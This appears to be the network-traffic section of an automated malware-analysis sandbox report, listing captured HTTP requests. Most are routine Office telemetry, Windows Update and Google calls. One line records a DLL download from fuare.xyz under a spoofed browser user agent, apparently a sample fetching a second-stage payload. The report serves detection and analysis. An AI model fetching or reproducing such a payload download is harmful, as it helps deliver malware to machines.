                        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: fuare.xyzConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OKvleD1bOO+N2GM&MD=X99kat3G HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                        Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
